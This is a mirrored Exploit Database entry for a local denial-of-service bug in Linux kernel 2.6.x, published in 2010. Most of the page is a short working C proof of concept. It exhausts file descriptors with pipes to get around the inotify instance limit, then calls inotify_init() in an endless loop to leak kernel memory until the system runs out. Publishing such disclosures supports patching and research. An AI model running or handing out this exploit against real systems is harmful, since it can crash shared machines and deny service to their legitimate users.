Linux Kernel 2.6.x – ‘inotify_init()’ Memory Leak Local Denial of Service

• Exploit Database
• 97 阅读

• 作者： Vegard Nossum
  日期： 2010-11-24
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/35013/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  /* source: https://www.securityfocus.com/bid/45036/info   The Linux kernel is prone to a local denial-of-service vulnerability.   Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. */     #include <sys/inotify.h> #include <unistd.h>   int main(int argc, char *argv[]) { int fds[2];   /* Circumvent max inotify instances limit */ while (pipe(fds) != -1) ;   while (1) inotify_init();   return 0; }